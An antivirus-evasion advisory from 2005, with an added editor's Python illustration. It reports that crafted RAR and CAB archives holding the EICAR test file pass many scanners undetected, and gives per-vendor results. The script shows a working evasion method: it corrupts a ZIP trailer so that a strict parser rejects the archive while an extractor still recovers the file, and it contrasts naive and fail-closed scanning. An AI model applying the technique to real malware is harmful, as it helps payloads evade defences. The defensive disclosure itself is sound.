Release Date  : 2005-10-05
Tested on     : Windows 2000 SP2 & SP4
Tested with   : Jotti Online Antivirus Scanner
Tested with   : VirusTotal Online Antivirus Scanner
Tested with   : Command line freeware UnRAR v3.50
Tested with   : PowerZip v7.06
Discovered by : fRoGGz
Credit to     : SecuBox Labs

-=====================================================================-

Analysis
__________

A specially crafted archive containing a virus passes through the
antivirus system without detection: an attacker can compress a malicious
payload and evade detection by some antivirus products. The bypassed
content poses no risk until it is extracted from the RAR archive; once
extracted, it is detected and removed by the antivirus like any other
file. Unlike WinZip or BitZipper, which refuse to open the crafted
archive, WinRAR and PowerZip open and extract it.

-=====================================================================-

Proof of Concept
________________

We have used: eicar.com

The EICAR test file is a 68-byte file that antivirus products "detect"
as if it were a virus. For more information, visit:
Ref: [ http://shadock.net/secubox/AVCraftedArchive.html ]

Legend: [!] detected   [?] nothing found   [~] nothing found, archive
flagged as suspect

Results for: SecuBox_AVPoC1.rar
_______________________________

[?] AntiVir                Found nothing
[?] ArcaVir                Found nothing
[?] Avast                  Found nothing
[!] AVG Antivirus          Found EICAR_Test (+187)
[!] BitDefender            Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal          Found Eicar.Test
[~] ClamAV                 Found nothing >> Suspect
[?] Dr.Web                 Found nothing
[?] eTrust-Iris            Found nothing
[?] eTrust-Vet             Found nothing
[!] Fortinet               Found EICAR_TEST_FILE
[?] F-Prot Antivirus       Found nothing
[!] Ikarus                 Found EICAR_Test
[?] Kaspersky Antivirus    Found nothing
[?] McAfee                 Found nothing
[?] NOD32                  Found nothing
[?] Norman Virus Control   Found nothing
[!] Panda                  Found Eicar.Mod
[?] Sophos                 Found nothing
[?] Symantec               Found nothing
[?] TheHacker              Found nothing
[?] UNA                    Found nothing
[?] VBA32                  Found nothing

Results for: SecuBox_AVPoC2.rar
________________________________

[?] AntiVir                Found nothing
[!] ArcaVir                Found Eicar.Test
[!] Avast                  Found EICAR Test-NOT!!
[!] AVG Antivirus          Found EICAR_Test
[?] BitDefender            Found nothing
[!] CAT-QuickHeal          Found Eicar.Test
[~] ClamAV                 Found nothing >> Suspect
[?] Dr.Web                 Found nothing
[?] eTrust-Iris            Found nothing
[?] eTrust-Vet             Found nothing
[?] Fortinet               Found nothing
[?] F-Prot Antivirus       Found nothing
[!] Ikarus                 Found EICAR_Test
[?] Kaspersky Antivirus    Found nothing
[?] McAfee                 Found nothing
[?] NOD32                  Found nothing
[?] Norman Virus Control   Found nothing
[!] Panda                  Found Eicar.Mod
[!] Sophos                 Found EICAR-AV-Test
[?] Symantec               Found nothing
[?] TheHacker              Found nothing
[?] UNA                    Found nothing
[?] VBA32                  Found nothing

Results for: SecuBox_AVPoC3.cab
________________________________

[?] AntiVir                Found nothing
[?] ArcaVir                Found nothing
[?] Avast                  Found nothing
[!] AVG Antivirus          Found EICAR_Test
[?] BitDefender            Found nothing
[?] CAT-QuickHeal          Found nothing
[?] ClamAV                 Found nothing
[?] Dr.Web                 Found nothing
[?] eTrust-Iris            Found nothing
[?] eTrust-Vet             Found nothing
[?] Fortinet               Found nothing
[?] F-Prot Antivirus       Found nothing
[?] Ikarus                 Found nothing
[?] Kaspersky Antivirus    Found nothing
[?] McAfee                 Found nothing
[?] NOD32                  Found nothing
[?] Norman Virus Control   Found nothing
[?] Panda                  Found nothing
[?] Sophos                 Found nothing
[?] Symantec               Found nothing
[?] TheHacker              Found nothing
[?] UNA                    Found nothing
[!] VBA32                  Found EICAR-Test-File

Unix test with ClamAV
_____________________

thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
SecuBox_AVPoC3.cab: OK
thot:~$ cabextract SecuBox_AVPoC3.cab
Extracting cabinet: SecuBox_AVPoC3.cab
  extracting EICAR.com

All done, no errors.
thot:~$ clamscan --no-summary EICAR.com
EICAR.com: Eicar-Test-Signature FOUND
thot:~$
thot:~$ clamscan -V
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005

-==================================================-
CREDiTS
---------------------
SecuBox Labs - fRoGGz
Greets fly out to: maew, Jordi Bosveld & VirusTotal
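Added example: scanner/extractor parsing asymmetry
__________________________________________________

The following Python script is an added illustration, not part of the
SecuBox advisory and not the PoC archives it describes. The advisory does
not disclose how SecuBox_AVPoC1-3 were crafted, so the script uses a ZIP
file built with the standard library as a stand-in for the RAR/CAB cases:
the end-of-central-directory record is damaged so that a strict parser
(Python's zipfile, playing the role of the AV engine) rejects the
container, while a sequential local-header walker (playing the role of
UnRAR/PowerZip/cabextract) still extracts EICAR.com. It then shows the
two possible scanner policies: the naive one that reports "OK" on a parse
failure, which is the gap the advisory documents, and a fail-closed one
that reports the container as suspect, which is what ClamAV's ">> Suspect"
flag above amounts to. All function names and the constructed archive are
the editor's own.

```python
"""Constructed ZIP stand-in for the crafted RAR/CAB archives (editor's example)."""
import io
import struct
import zipfile
import zlib

# The standard 68-byte EICAR test string; harmless, flagged by every AV.
EICAR = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
         b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")

LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")   # 30-byte ZIP local file header
LOCAL_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"


def build_zip(name: str, payload: bytes) -> bytes:
    """Well-formed, deflated ZIP: the payload is not visible to a raw byte scan."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def craft_archive(blob: bytes) -> bytes:
    """Damage the end-of-central-directory signature (last 22 bytes, no comment).

    A central-directory-driven parser now reports 'not a zip file'; an
    extractor that walks local headers from the start never looks there.
    """
    assert blob[-22:-18] == EOCD_SIG, "unexpected trailer"
    return blob[:-22] + b"PK\x00\x00" + blob[-18:]


def walk_local_headers(blob: bytes):
    """Sequential extractor: yield (name, data) using local headers only."""
    off = 0
    while blob[off:off + 4] == LOCAL_SIG:
        (_, _ver, flags, method, _t, _d, crc, csize, usize,
         nlen, xlen) = LOCAL_HDR.unpack_from(blob, off)
        if flags & 0x08:                      # sizes live in a data descriptor
            raise ValueError("data-descriptor entries not supported here")
        name = blob[off + 30:off + 30 + nlen].decode()
        start = off + 30 + nlen + xlen
        cdata = blob[start:start + csize]
        if method == 8:                       # raw DEFLATE stream
            d = zlib.decompressobj(-15)
            data = d.decompress(cdata) + d.flush()
        elif method == 0:                     # stored
            data = cdata
        else:
            raise ValueError(f"unsupported method {method}")
        if len(data) != usize or (zlib.crc32(data) & 0xFFFFFFFF) != crc:
            raise ValueError(f"{name}: size/CRC mismatch")
        yield name, data
        off = start + csize


def scan(blob: bytes, fail_closed: bool, depth: int = 0) -> str:
    """Toy AV verdict: FOUND, OK, or SUSPECT (looks like a ZIP but will not parse)."""
    if EICAR in blob:
        return "FOUND"
    if not blob.startswith(LOCAL_SIG) or depth > 4:
        return "OK"
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            members = [zf.read(info) for info in zf.infolist()]
    except zipfile.BadZipFile:
        # The whole point: a scanner that cannot parse the container must
        # not report it clean. Fail closed, as ClamAV's "Suspect" does.
        return "SUSPECT" if fail_closed else "OK"
    for member in members:
        if scan(member, fail_closed, depth + 1) == "FOUND":
            return "FOUND"
    return "OK"


def demo() -> dict:
    """Reproduce the advisory's pattern: container OK, extracted member FOUND."""
    good = build_zip("EICAR.com", EICAR)
    crafted = craft_archive(good)
    extracted = dict(walk_local_headers(crafted))
    return {
        "good_archive": scan(good, fail_closed=False),
        "crafted_naive": scan(crafted, fail_closed=False),
        "crafted_fail_closed": scan(crafted, fail_closed=True),
        "crafted_extracts": "EICAR.com" in extracted,
        "extracted_member": scan(extracted["EICAR.com"], fail_closed=False),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22} {value}")
```

Run with python3. The "crafted_naive" and "extracted_member" verdicts
mirror the ClamAV transcript: the container scans clean, the member
extracted from it is detected. The operational lesson is the one the
advisory's own results tables make: a gateway or mail scanner that returns
OK whenever a container fails to parse is bypassable by construction, so
either treat unparsable containers as suspect or rely on on-access
scanning of the extracted files.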